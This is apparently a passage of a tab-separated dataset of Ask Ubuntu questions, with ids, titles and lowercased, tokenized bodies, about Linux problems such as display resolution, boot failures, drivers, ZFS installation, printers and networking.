1440 1443 1448 1493 -hsync +vsync ~ $ xrandr -- newmode `` 2560x1440_60.00 '' 312.25 2560 2752 3024 3488 1440 1443 1448 1493 -hsync +vsync ~ $ xrandr screen 0 : minimum 8 x 8 , current 3286 x 1437 , maximum 8192 x 8192 vga-0 disconnected ( normal left inverted right x axis y axis ) lvds-0 connected 1366x768+0+669 ( normal left inverted right x axis y axis ) 344mm x 193mm 1366x768 60.0*+ hdmi-0 connected primary 1920x1080+1366+0 ( normal left inverted right x axis y axis ) 600mm x 340mm 1920x1080 60.0*+ 59.9 50.0 30.0 25.0 24.0 60.0 50.0 1680x1050 60.0 1440x900 59.9 1280x1024 75.0 60.0 1280x960 60.0 1280x800 59.8 1280x720 60.0 59.9 50.0 1152x864 75.0 1024x768 75.0 70.1 60.0 800x600 75.0 72.2 60.3 56.2 720x576 50.0 720x480 59.9 640x480 75.0 59.9 59.9 480x576 50.0 480x480 59.9 2560x1440_60.00 ( 0x34f ) 312.2mhz h : width 2560 start 2752 end 3024 total 3488 skew 0 clock 89.5khz v : height 1440 start 1443 end 1448 total 1493 clock 60.0hz ~ $ xrandr -- addmode hdmi-0 2560x1440_60.00 x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 29 current serial number in output stream : 30 what i intend to do next : try another hdmi cable ? try hdmi to dvi-d cable ? try hdmi to displayport cable ? another type of adapters ? vga to dvi-d ? buy another laptop with another graphic card . damn . my ideas pretty much end here . any ideas ? any explanations why it is n't working are appreciated . edit : i 've managed to make it work through hdmi to dvi-d cable on windows 8 , by setting custom resolution in nvidia settings manager . although monitor outputs that bad cable connected frequently ( it sais that it needs dual-link for that ) , the high resolution is actually set . my attempts to set custom resolution with xrandr failed with the same error as above .
368750	xubuntu fresh install black screen !	after installing xubuntu it goes to black screen after xubuntu loading for a few seconds . i do n't see any grub . tried holding down but no luck ! i ca n't even load it from usb . i tried nomodeset and removing gfxpayload from usb run but still no boot ! i can not figure out what is the problem !
368755	can not boot neither of my dual-boot os	so i wanted to install ubuntu 13.10 , along side my windows , as dual-boot . but then the installation threw error . apparently the installation file was corrupted when making the usb bootable . anyway , i could n't finish the installation . so i just restarted my machine and i did n't get the option of booting os . i just got to a black screen which had only grub rescue > waiting for me to type some magical commands . of course i do n't know what to do , because even -help , -h or any of this type was not a recognized command . so i ran a live desktop version of ubuntu , from the usb , and tried to remake it bootable through the integrated startup disk creator . i got unhandled exceptions . now i am stuck without being able to boot any of my os and not knowing what to do . yay ! help , please ...
368757	how can i stop my dell inspiron laptop from dimming the screen when i plug in the ac adapter ?	i 'm using a dell inspiron n5110 laptop with ubuntu 13 and i find that every time i plug the power in to charge , the screen brightness dims . if i go into the brightness settings window the brightness immediately goes back to full brightness ( as they are set ) without me changing anything . in order to keep the screen brightness on full i have to keep the brightness settings window open in the background . as soon as the battery is charged the brightness drops again until i unplug the power again . this happens every time and now i know how to get round it it 's not a huge problem but still quite annoying . any advice would be gratefully received . let me know if you need any more info . i 'm quite new to ubuntu so if you can give me nice simple instructions that would be great : )
368760	netextender vpn client not working on ubuntu 12.10 x64	i ca n't seem to get my sonicwall netextender to work . i have the latest version of the software installed on my system too . when ever i try to connect i get this error : could not resolve ssl-vpn : https:0 that 's all it says and i ca n't find any help online on how to resolve the issue . i have the netextender software installed on my desktop that uses windows 8 and i 'm able to connect to our server without a problem . my co-worker has it installed on his macbook and it works as well . so the issue should n't be with the server ... i would greatly appreciate any help or pointing in the right direction , as i 'm currently lost as to what step to take next . ps . i 've already confirmed that the correct so files are located in the /usr/lib folder .
368761	bluetooth mic : connected , but no sound	i bought a set of turtle beach xp300 's , which have a wifi receiver for audio , and a bluetooth receiver as well . the idea was to use the headphones ' inbuilt system for audio , but have the input to be from the headset . now i went through a lot of searches , and i was finally able to connect the headset to my computer , and i was able to get pulseaudio to recognize it ( i still have to run pactl load-module module-bluetooth-discover ) . the problem now is that the computer does not detect any input from it . i am using blueman to connect , i set up the headset as hsp/hfp ( a2dp is not detected for some reason , not sure why ) . information on my setup : ubuntu 13.10 toshiba laptop bluetooth 4.0 adapter from kinivo here 's a screenshot as to what i mean , in case it 's not clear : https : //www.dropbox.com/s/1qjzrlf13r91as6/screenshot % 20from % 202013-10-30 % 2018 % 3a38 % 3a48.png
368763	selecting a motherboard for new build	i am designing a new system based around ubuntu ( of course ) and i am looking at a list of compatible motherboards . the motherboard i currently have asus p8z68-v does not have raid or usb3.0 support for ubuntu only on windows with a driver . i have looked through asus and evga 's sites and found little to no info on ubuntu ( linux ) support . is there a list of compatible motherboards out there ?
368764	is ubuntu one a peer-to-peer application ?	what sort of technology does ubuntu one use for file syncing ? i was told by my school that ubuntu one and http : //one.ubuntu.com are blocked because it is a `` peer-to-peer application '' , while they still allow google drive . is this true ? or is it some sort of misunderstanding ? i 'm hoping for a response from someone who understands the technical details of how ubuntu one works .
368767	how can i repair a ttf-umefont installation	i have ubuntu 13.04 and i started to upgrade to 13.10 . upgrading started well , files were sucessfully downloaded but a crash message appeared : < type ´exceptions.systemerror´ > ( e : the package ttf-umefont needs to be reinstalled , but i can´t find an archive for it ) i looked for some info in fórums then i tried to update by terminal and with apt-get -f update . nothing changed ; then , i triued to delete the ttf-umefont file , and nothing changed . now , i can´t update anything because this error message . could anyone help me ?
368770	unable to install zfs ( ubuntu 13.10 )	i 'm fairly new to ubuntu and wanted to setup a server running zfs/xbmc - the xbmc install went fine , however i ran into trouble getting zfs working . configuration : ubuntu 13.10 ( gnu/linux 3.12.0-rc7+ x86_64 ) i attempted to install zfs native using : sudo add-apt-repository ppa : zfs-native/stable sudo apt-get update sudo apt-get install ubuntu-zfs this failed to install due to `` module build for the currently running kernel was skipped since the kernel source for this kernel does not seem to be installed . '' trying sudo modprobe zfs shows fatal error : module not found . here , they mentioned it was to do with lacking build dependences- i followed the answer which was to run sudo apt-get remove -- purge ubuntu-zfs zfs-dkms zfsutils spl spl-dkms libzfs1 dkms then , reboot . then , do : sudo apt-get install linux-headers-generic build-essentia sudo apt-get install ubuntu-zfs `` this leaves me in the same situation with `` building only for 3.12.0-rc7+ module build for the currently running kernel was skipped since the kernel source for this kernel does not seem to be installed . '' when trying to install ubuntu-zfs . trying sudo apt-get install -- reinstall zfs-dkms also does not work .
368772	unable to boot a live dvd on lenovo laptop	i need guidance step by step please . http : //pastebin.com/j6zaq8fa also , i am not able to access the content on the hard disk and dvd writer . neither am i able to boot the laptop using a live cd in spite of the dvd writer being detected . also i am getting the following warning : ( etherape:4817 ) : ibus-warning ** : the owner of /home/abcd/.config/ibus/bus is not root ! also please tell me the method to understand the reason behind these warnings .
368778	ubuntu 12.04 lts mirrored/cloned displays on boot	i have a lenovo thinkcentre m91p with an intel integrated hd4000 . when i boot the machine my displays become mirrored . i need them to be separate monitors . if i run xrandr and adjust the resolution and positioning it works fine . xrandr output ( while mirrored ) : screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 8192 x 8192 vga1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 477mm x 268mm 1920x1080 60.0*+ 1600x1200 60.0 1680x1050 60.0 1400x1050 60.0 1600x900 60.0 1280x1024 75.0 60.0 1440x900 59.9 1280x960 60.0 1280x800 59.8 1152x864 75.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 72.8 75.0 66.7 60.0 720x400 70.1 hdmi1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 477mm x 268mm 1920x1080 60.0*+ 1600x1200 60.0 1680x1050 60.0 1400x1050 60.0 1600x900 60.0 1280x1024 75.0 60.0 1440x900 59.9 1280x960 60.0 1280x800 59.8 1152x864 75.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 72.8 75.0 66.7 60.0 720x400 70.1 dp1 disconnected ( normal left inverted right x axis y axis ) lspci output : 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0102 ] ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : lenovo device [ 17aa:3070 ] control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 43 region 0 : memory at fe000000 ( 64-bit , non-prefetchable ) [ size=4m ] region 2 : memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] region 4 : i/o ports at f000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : [ 90 ] msi : enable+ count=1/1 maskable- 64bit- address : fee00018 data : 0000 capabilities : [ d0 ] power management version 2 flags : pmeclk- dsi+ d1- d2- auxcurrent=0ma pme ( d0- , d1- , d2- , d3hot- , d3cold- ) status : d0 nosoftrst- pme-enable- dsel=0 dscale=0 pme- capabilities : [ a4 ] pci advanced features afcap : tp+ flr+ afctrl : flr- afstatus : tp- kernel driver in use : i915 running udevadam -- monitor does display events when the monitors are plugged/unplugged . the displays are connected via a vga port , and a displayport to dvi adapter . there is a caveat behind this , you can not use an xorg.conf file to fix this .
368780	any way to stop the launcher from appearing when click-dragging a file ?	so when you click-drag a file , if the launcher is auto-hidden it 'll appear for this , any way to stop that ? just wondering , ubuntu13.10 unity 7.1.2
368781	udp traffic to be routed through linux server	how to redirect user 's internet traffic ( udp & tcp ) to an server that locate in another country . as the current route is bad . what software would you recommend on the remote ubuntu server to make this possible ? i have tried squid3 but i do n't need 95 % of its future plus its complicated . i just need a simple server able to go grab the data and return it back to the user simple as that no user authentication required nor db or acl .. thank you
368782	mouse fails after using remmina for a bit	i just loaded 13.10 on my workstation as a replacement to windows . however i have to rdp to a windows machine because some of the software i use to work is windows only and not wine tested . i log in and everything seems to be functioning correctly but after a while i can not left or right click on anything except in the last window i was in when it fails . i can alt-tab through the programs and close them with the keyboard . but i can type in the window but i can not mouse click . the only fix seems to be log out and log back in . that works but it is extremely annoying ... may have to switch back to windows.. please help i want to stay on linux but i have to work lame !
368783	`` did not find expected hexadecimal number '' when bootstraping juju on windows	with juju on windows 8 i get the following error : can not parse : c : \users\user\appdata\roaming\juju|enviornments.yaml\yaml error : line 126 : did not find expected hexadecimal number it seems that it does not like my subscription id that i created with a new azure account . any ideas on how to fix this ? it is a legitimate subscription id ...
368786	does chrome in ubuntu have `` recent tabs '' ?	ubuntu 12 , chrome 30 as noted here , chrome has a recent tabs feature . but in ubuntu i do n't see that option . do i need to turn it on or is it just not available ? when i search in settings there 's no results for `` recent '' .
368788	torrentflux stopped working after upgrade to 13.10	did a clean upgrade fom 13.4 . after this , torrentflux stopped working . anyone got an idea on how to resolve it ? tried dpkg-reconfigure to setup the package . torrentflux is not under localhost/torrentflux anymore
368790	recode can not find files when is running as a nautilus script	i created a nautilus action script to change file encoding using recode application . my action is : [ desktop entry ] type=action toolbarlabel [ en_us ] =convert encoding from windows-12 toolbarlabel [ en ] =convert encoding from windows-12 toolbarlabel [ c ] =convert encoding from windows-12 tooltip [ en_us ] =converts file content encoding from windows-1256 and saves as utf-8 tooltip [ en ] =converts file content encoding from windows-1256 and saves as utf-8 tooltip [ c ] =converts file content encoding from windows-1256 and saves as utf-8 name [ en_us ] =convert encoding from windows-1256 name [ en ] =convert encoding from windows-1256 name [ c ] =convert encoding from windows-1256 profiles=profile-zero ; [ x-action-profile profile-zero ] selectioncount==1 mimetypes=all/allfiles ; matchcase=false basenames=*.srt ; exec=recode windows-1256 `` % f '' name [ en_us ] =default profile name [ en ] =default profile name [ c ] =default profile executionmode=displayoutput the code worked properly for a while but now it fails ! when i set action 's executionmode to displayoutput it displays this : run command : /bin/sh -c 'recode windows-1256 `` '\ '' /home/ariyan/a.srt'\ '' '' ' standard output : standard error : recode : fopen ( '/home/ariyan/a.srt ' ) : no such file or directory it ca n't find the file while it is there ! ( when i run the same command in a terminal window it works ) what is the problem ? why sh ca n't find the file ? thanks
368794	how do i replace unity ?	i wanted to use ubuntu 12.04 for its long term support . but i can not stand unity . i can not find a way to replace it with compizconfig , so i tried replacing it with lubuntu . when i restarted my computer started to load lubuntu , then just went right on with ubuntu as if nothing had happened . likewise , it shows lubuntu when it shuts down . what is the deal ? i 'm confused here , is ubuntu 12.04 supposed to be an operating system or a desktop interface ? can i even run ubuntu with a lubuntu interface ? is there a way to do this in compizconfig that i should be doing instead ? thanks everyone . now how do i mark this question as solved ?
368796	ubuntu 13.10 slow booting	i installed ubuntu 1 day ago . it has very slow booting . booting takes 2-3 minutes . i have bootchart logs but have no idea how fix it . ubuntu 13.10 with gnome-shell ( gdm ) cpu : amd a10-4600m ram : 8gb
368798	can not install ms office 2007	when i install ms office 2007 through wine ( i followed the wine setting before ) , it detected a setup error : a required z : \media\usb\office enterprise 2007 dvd\access.ww\osetup.dll can not be loaded . this may indicate that the file is missing or damaged . what is the problem ?
368801	ubuntu boots with `` broken pipe '' message and seems to work fine	i just went through heaven and hell with windows 8.1 and ubuntu 12.04 . got live usb , disabled uefi , installed ubuntu , ran boot-repair . now 2 weird things happened that i can not really explain actually i 'm not sure if my systems are working fine . the last thing boot-repair told me was to make sure bios booted on sda2/efi/ubuntu/grubx64.efi ! ! so i opened my bios checked out boot options ( they were empty ) switched my boot to `` cms and uefi '' and the next time i was n't quick enough with clicking f2 and i guess grub booted . surprised by the events i decided to boot ubuntu and while booting i got several strange messages `` broken pipe could not write smth.. '' after that ubuntu booted fine with broken wireless which i managed to fix through network managment . now i 'm not sure what am i supposed to do next is something unfinished or is everything working fine ? note : i 'm right now going to restart and try to boot windows8 ( i have it listed in grub ) and then update post on the events if something happens . i was told to leave this link to help people help me `` http : //paste.ubuntu.com/6333013/ '' i 've been at this for about 4 hours reading older q/a and i 'm sorry if i repeated some boring old question . : /
368804	blender is not running in ubuntu 12.04	i have downloaded blender 2.68 from official website . after extracting the zipped file , earlier i was able to run it by simply clicking the 'blender ' executable file in the folder . but now , whenever i try to run it by clicking the executable file . it gives error as : could not display `` /home/anuj/blender-2.68a-linux-glibc211-x86_64/blender '' . there is no application installed for executable files . do you want to search for an application to open this file ?
368808	low graphics mode ? i can not get into my computer . help !	i recently updated to 13.10. since then i have not been able to access my computer at all . it tells me the system is running in low graphics mode . my screen , graphics card , and device settings could not be detected correctly . i will have to configure them myself . from there , nothing works . it gives me a bunch of options but none of them do shiz . by the way i have a powercolor radeon hd7850 graphics card . help me make it work i tried this stupid solution that someone else posted , but i can not make any sense of it . can somebody please just lay out what i need to do in a simple , straightforward way ? please dont just be a jerk and mark this as a duplicate . i need help
368812	mac mini 12.04.3 lts boot issue	i installed ubuntu 12.04.3 lts as single boot on my mac mini using usb after a problem with osx and no cd drive . it 's been a real pain but am able to boot the system , disabled x and have added ssh to connect via putty . i can connect via putty and login . the ssh session acts normal and does not appear to have any issues . however , the output on the monitor is frozen after the following lines : dosfsck 3.0.12 , 29 oct 2011 , fat32 lfm /dev/sda1 : 8 files , 4220/ ... /dev/sda2 : clean ... if i was not connected using putty i would need to use safe mode and connect to the root shell . i have no idea why the ssh session works but i can not login via monitor access . any help you may provide is greatly appreciated .
368813	do i need to start vim with sudo ?	when i start vim with $ vim the changes i made to .vimrc are not in effect ; but when i start with $ sudo vim the changes are in effect . what is the cause of this ? do i need to start vim with sudo always ?
368814	is a second graphics card worth it ?	considering that some systems have both intel 4xxx and nvidia/other graphics card , yet apparently it is n't easy to switch between them on linux , is it really worth it getting the extra nvidia card , like in the bonobo extreme laptop ? in terms of normal web browsing/ web development / programming /webgl use , does ubuntu take advantage of a second graphics card , or use it for processing like mac os grand central ?
368816	booting back into windows 7	i recently installed ubuntu 13.10 alongside my windows 7 operating system . whenever i boot my computer i am given the ubuntu loader where i can select either windows7 loader or ubuntu . when i press ubuntu it boot properly , but when i slect windows7 loader , the screen goes black and the same ubuntu loader appears . therefore i am unable to select windows 7 at all , someone pleas help me with this situation because i need access to my windows 7 account ! ?
368817	what to do with private bug reports on launchpad ?	over time i gathered more than 10 launchpad bug reports that were reported with apport , initially marked as private and never responded to . there was one i 've discussed additionally on irc and that 's the only one i can remember being processed . what should i do with them ? how can i make sure they do n't contain anything really private before making those bugs public ?
368819	how do i install smart notebook 11 on ubuntu 12.04 ?	i want to run my smart board using ubuntu , rather than windows . can anyone talk me through the process ?
368823	asus x79deluxe motherboard	has anyone run ubuntu on this motherboard , does everything work . my current motherboard ( asus p8z68-v ) does not have usb3.0 or raid support . everything else does work . x79deluxe
368824	webcam stopped working after upgrade to 13.10	webcam was working fine in 13.04 but not anymore . cheese says : ** ( cheese:16942 ) : warning ** : cheese-main.vala:256 : error : no device found same problem in camorama , so it 's not a cheese bug . looking closer , it seems the problem is a missing /dev/video0 file . the webcam is an integrated webcam on an hp pavilion .
368826	how to reset chroot	i 've been using chroot to do some testing . but after i 'm done i want a fast way to simply reset the chroot so i can reuse it again without recreating it from scratch .
368829	conky ( or other apps ) on gnome-screensaver unlock screen	i found this awesome theme for conky to make it look like google now but it really gets in the way on my desktop . i want to put it on my unlock screen just like mint has a clock on the unlock screen . i found this thread but it 's old and unanswered . any ideas ? btw i 'm running saucy
368832	need to remove fglrx , get black screen upon login 13.10	yesterday i installed fglrx and rebooted . now once i login the screen stays black . i 've tried booting into nomodeset but ca n't get the terminal to let me uninstall fglrx . i am just learning linux and trying to figure out how everything works still . thanks
368834	error when i try to create a xorg.conf	i currently change my graphic driver from nvidia to intel since my graphic card changed . when i try to reconfigure my xorg and create a xorg.conf in root shell at recovery mode by execute 'x -configure ' , it failed and throw : x.org x server 1.12.3 release date : 2012-07-09 x protocol version 11 , revision 0 build operating system : linux 2.6.24-29-xen x86_64 ubuntu current operating system : linux xsuii-unknow 3.8.0-33- generic # 48~precise1-ubuntu smp thu oct 24 16:28:06 utc 2013 x86_64 kernel command line : boot_image=/vmlinuz-3.8.0-33-generic root=uuid=e71583e1-1504-4fb4-bb4b-2df3fc315113 ro quite splash nomodeset i915.i915_enable_rc6=1 i915 . i915_enable_fbc=1 pcie_aspm=force build date : 09 july 2012 05:20:18pm xorg-server 2:1.12.3+git20120709+server-1.12-branch.60e0d205 -0ubuntu0ricotz~precise ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.28.2 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.0.log '' , time : thu oct 31 09:24:17 2013 list of video drivers : sis neomagic mach64 s3 siliconmotion savage trident intel r128 sisusb nouveau tdfx mga cirrus ati radeon fbdev vesa ( ++ ) using config file : `` /home/xsuii/xorg.conf.new '' ( == ) using system config directory `` /usr/share/x11/xorg.conf .d '' number of created screens does not match number of detected devices . configuration failed . ddxsiggiveup : closing log server terminated with error ( 2 ) . closing log file . i do n't know how to deal with this ? thanks if you can help me .
368839	prevent lost of highlighting of microsoft word documents ?	how can i open a ms word .doc file in ubuntu in a way that will preserve the highlighting done when it was created ? libreoffice strips the highlighting when i load the files , and google docs will not open them at all .
368841	just installed 13.10 and everything is fine except i can not connect to the internet . any thoughts ?	i just installed ubuntu 13.10 on my hp g62 laptop and the install went smoothly . i did the install off of a usb drive after trying ubuntu . while i was testing it , i connected to my wireless with out issue and surfed a little . after the install , no wireless . i can still connect to my wireless network ( at least it tells me i 'm connected at full strength ) but no servers can be found . i attempted to ping google to no avail and i attempted to ping my router to no avail . i tried to then hard wire the machine and once again it told me that i was connected but i was not . when i ran dmesg , i got the following message : warning : nss-myhostname is not installed . changing the local hostname might make it unresolvabe . please install nss-hostname ! is the hostname the issue ? if so , how do i resolve it with out internet connection ? if it 's not the issue , how do i move forward ? thanks for any help . edit . i forgot to attach the image of my ifconfig if that might help .
368842	how to install adobe-flash-properties-gtk on saucy 13.10 ?	how can i install adobe-flash-properties-gtk on the new ubuntu 13.10 saucy ? it was present since last version raring 13.04 . is there another way to control the sites allowed to use the webcam ? the `` partner '' repository are enabled . cheers . ps : instructions like this one `` ca n't install adobe-flash-properties-gtk '' are n't written for ubuntu later than raring 13.04 .
368843	is there anything i have to do to optimize ssd for ubuntu 13.10 ?	i got a ssd and installed ubuntu 13.10 on it and was just wondering if there'es anything special i had to do or can i just leave it alone at defaults ?
368844	installing logitech extreme 3d pro drivers	i have a windows 7 virtual machine in ubuntu . but i do n't know how to pair up a logitech extreme 3d pro with the virtual machine as ubuntu does not detect it . can anyone help ? thanks , anoymous
368846	terminal does not find xmonad.hs	iam using xmonad on ubuntu 13.04 , in ~/.xmonad my computer has the file xmonad.hs , if i try to read it from terminal using nano it opens a new file , i can access the file opening it from geany or gedit , but if i try to recompile it , the system does not find that file , so i can not configure xmonad , every thing i try on this file from console does not work , because terminal even if i am root can not see it , can you help me solve this issue ?
368848	upgrade and update ubuntu server	there is a ubuntu server 12.04 lts ; and i want to be up to date and updated with security updates and have the most up to date version of packages installed . but i do not want the server to change from lts version to other versions . if so only from one lts version to another lts version . what commands should i regularly use to keep the server up to date ? ?
368850	lost all files and folders in gui data folder	i 'm using 12.04 . after unmounting my data folder by clicking the eject icon , the system asked me to empty the trash . after doing that , i lost all files and folders in data folder . but i could still see them through a terminal . anyone can help me to find them back in gui ? thanks .
368854	restoring a hard drive	i had a laptop on which there was an amd x2 display card . suddenly this laptop went kaput . incidentally the hard drive was safe . i had checked it using another machine . further , i got this hard drive covered using an external usb hdd case . one day , while sleeping , this case fell down and since then i have not been able to restore the contents of the hard drive ( rather could not find tools to recover contents from the hard drive ) . this hard drive had three partitions ( a ) ntfs ( b ) linux ( either ext4 or reiserfs ; i do not remember which one i had formatted in ) ; and ( c ) swap . how do i recover my contents ?
368856	how to know which partition is which ?	well i was just wondering what partition belongs to which . on my computer i have windows 7 and two ubuntu systems ( it was an accident , which is why i need to know which partition is which ) . so how do i know which one is which ? ? ps here 's the codes : jp @ jp-satellite-l555d : ~ $ sudo update-grub [ sudo ] password for jp : generating grub.cfg ... found linux image : /boot/vmlinuz-3.11.0-12-generic found initrd image : /boot/initrd.img-3.11.0-12-generic found memtest86+ image : /boot/memtest86+.bin found windows 7 ( loader ) on /dev/sda1 found windows 7 ( loader ) on /dev/sda2 found windows recovery environment ( loader ) on /dev/sda3 found ubuntu 13.10 ( 13.10 ) on /dev/sda7 done jp @ jp-satellite-l555d : ~ $ sudo fdisk -l disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xf6f5148e device boot start end blocks id system /dev/sda1 * 2048 3074047 1536000 27 hidden ntfs winre /dev/sda2 3074048 213421022 105173487+ 7 hpfs/ntfs/exfat /dev/sda3 469676032 488396799 9360384 17 hidden hpfs/ntfs /dev/sda4 213422078 469676031 128126977 5 extended /dev/sda5 300185600 463910911 81862656 83 linux /dev/sda6 463912960 469676031 2881536 82 linux swap / solaris /dev/sda7 213422080 300185599 43381760 83 linux partition table entries are not in disk order thanks to whoever can answer this . another quick question , what is the extended partition ? ?
368857	gnome-shell dependencies can not be resolved	the following packages have unmet dependencies : gnome-shell : depends : gir1.2-telepathyglib-0.12 but it is not going to be installed depends : libgjs0-libmozjs-17.0-0 but it is a virtual package depends : libpulse-mainloop-glib0 ( > = 1:0.99.1 ) but 1:3.0-0ubuntu7~raring1 is to be installed depends : libpulse0 ( > = 1:0.99.1 ) but 1:3.0-0ubuntu7~raring1 is to be installed depends : libxfixes3 ( > = 1:4.0.1 ) but 1:5.0-4ubuntu5 is to be installed depends : libxi6 ( > = 2:1.2.99.4 ) but 2:1.6.99.1-0ubuntu3 is to be installed depends : gnome-shell-common ( = 3.8.3-1ubuntu5~raring3.2 ) but 3.8.3-1ubuntu5~raring3.2 is to be installed depends : gir1.2-gkbd-3.0 but it is not going to be installed depends : gir1.2-ibus-1.0 ( > = 1.4 ) but it is not going to be installed depends : gir1.2-nmgtk-1.0 but it is not going to be installed depends : gir1.2-telepathylogger-0.2 ( > = 0.8.0 ) but it is not going to be installed
368860	acer wireless network not working	i installed ubuntu 12.04 64 bit desktop version in acer aspiree1-470 . everything work great except wireless and touch pad . when i run additional driver there nothing to activate and when i run `` rfkill list '' it 's show 0 : hci0 : bluetooth soft blocked : yes hard blocked : no 1 : acer-wireless : wireless lan soft blocked : no hard blocked : no i do n't know too much command in linux and i hv no i ieda hot to work wireless and touch-pad
368861	upgrade to 13.10 from 13.04 fails spectacularly	using the update option on a slow connection , well lets say this option is not the greatest idea . 7 hours later and it all goes horribly wrong . suggest that ubuntu accounts for the slow internet in its home territory , africa when it comes to installs .
368863	how to login remotely using ssh	when i 'm trying to login remotely using ssh , it asks something like : the authenticity of host '192.168.0.4 ( 192.168.0.4 ) ' ca n't be established . ecdsa key fingerprint is 64 : ec : a0 : fa : bf : f0:65 : a6 : b2 : af:90 : f2:97:44 : e4:3f . are you sure you want to continue connecting ( yes/no ) ? what is that , and what can i do ?
368864	where or how do i install a synaptic driver for my touchpad ?	i have a eeepc 1025c by asus after install lubuntu everything is perfer except the touchpad , it ca n't be detected nor the drivers is install hence i tried using other de kde , xfce , gnome none works . i 'm currently browsing using a usb mouse , please help fix the touchpad . thanks
368866	ubuntu screen blinks and turns off	i 'm using ubuntu 10.10 , sometime screen just blinks and turns off system , after about 5 seconds log-in screen appears results in loosing everything i was working previously . can any one helpme out ... ? i 'm sure it is not the problem of power fluctuation . while turning off it shows something about power manager that i could not read ( shows just for fraction of seconds ) ... .
368868	ubuntu 13.10 64bit does not detect intel graphic card !	i have installed ubuntu 13.10 64bit on my laptop . the problem i have is high gpu temperature and i want to switch to my intel graphic card but my system just detects nvidia card . here is my cpu link info and vga info http : //ark.intel.com/products/52231 how to detect my intel graphic card and how to disable nvidia card and switch to intel card ?
368871	cant add network printer with system-config-printer package	hello im new here and i dont know if im doing it right but i hope yes . i have a printer conected to a windows 8 machine , also i had ubuntu 13.04 and it worked fine when i printed from linux to windows but when i upgraded to 13.10 my printer didnt worked , i removed it thinking that would fix it but when i tryed to add the printer again i couldnt , i reinstalled cups and the system-config-printer-gnome package but didnt worked . here is the terminal log : erick @ tauro : ~ $ system-config-printer caught non-fatal exception . traceback : file `` /usr/share/system-config-printer/probe_printer.py '' , line 255 , in _do_find fn ( ) file `` /usr/share/system-config-printer/probe_printer.py '' , line 367 , in _probe_hplip stderr=null ) file `` /usr/lib/python2.7/subprocess.py '' , line 709 , in init errread , errwrite ) file `` /usr/lib/python2.7/subprocess.py '' , line 1326 , in _execute_child raise child_exception oserror : [ errno 2 ] no existe el archivo o el directorio continuing anyway.. traceback ( most recent call last ) : file `` /usr/share/system-config-printer/newprinter.py '' , line 912 , in on_btnnpforward_clicked self.nextnptab ( ) file `` /usr/share/system-config-printer/newprinter.py '' , line 1064 , in nextnptab stderr=file ( `` /dev/null '' ) ) file `` /usr/lib/python2.7/subprocess.py '' , line 709 , in init errread , errwrite ) file `` /usr/lib/python2.7/subprocess.py '' , line 1326 , in _execute_child raise child_exception oserror : [ errno 2 ] no existe el archivo o el directorio any suggestion please ? c :
368876	help connecting a domain and my server	i have a ubuntu server and also i have a domain when i run the serve in lan ( local area network ) it works perfectly , but over wan it cant connect to the server . i have deactivate the firewall from the router and the server . not advisable . however , when i ping the ip and the domain it seems to be responding . what are the files that have to be configured on apache2 . thanks~
368878	hanging problem with ubuntu 12.04	i 'm arun i 'm using ubuntu 12.04 version on dell vostro facing severe hanging problem in which i cant move my mouse over the screen and all my stuff gon na be in to freeze state any one will solve this will be a great help for me .
368880	wired network ca n't work in ubuntu12.04	i first installed ubuntu 13.04 , but wired network ca n't work , and i consulted the solution from http : //ubuntuforums.org/showthread.php ? t=1022411 & highlight=rtl8111+8168 , and it did n't work.so i try to install ubuntu 12.04 , and the same problem . here is my info lspci -v 03:00.0 ethernet controller : qualcomm atheros ar242x / ar542x wireless network adapter ( pci-express ) ( rev 01 ) subsystem : qualcomm atheros device 0035 flags : bus master , fast devsel , latency 0 , irq 17 memory at fd6f0000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : ath5k kernel modules : ath5k 0c:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 02 ) subsystem : lenovo device 2108 flags : bus master , fast devsel , latency 0 , irq 46 i/o ports at e800 [ size=256 ] memory at f8fff000 ( 64-bit , prefetchable ) [ size=4k ] memory at f8fe0000 ( 64-bit , prefetchable ) [ size=64k ] expansion rom at fdef0000 [ disabled ] [ size=64k ] capabilities : < access denied > kernel driver in use : r8168 kernel modules : r8168 and ifconfig eth0 link encap : 以太网 硬件地址 00:26:18 : a2:17 : d0 up broadcast multicast mtu:1500 跃点数:1 接收数据包:0 错误:0 丢弃:0 过载:0 帧数:0 发送数据包:0 错误:0 丢弃:0 过载:0 载波:0 碰撞:0 发送队列长度:1000 接收字节:0 ( 0.0 b ) 发送字节:0 ( 0.0 b ) 中断:46 基本地址:0x4000 lo link encap : 本地环回 inet 地址:127.0.0.1 掩码:255.0.0.0 inet6 地址 : : :1/128 scope : host up loopback running mtu:16436 跃点数:1 接收数据包:412 错误:0 丢弃:0 过载:0 帧数:0 发送数据包:412 错误:0 丢弃:0 过载:0 载波:0 碰撞:0 发送队列长度:0 接收字节:37410 ( 37.4 kb ) 发送字节:37410 ( 37.4 kb ) wlan0 link encap : 以太网 硬件地址 00:24:2c : ad:8e:80 inet 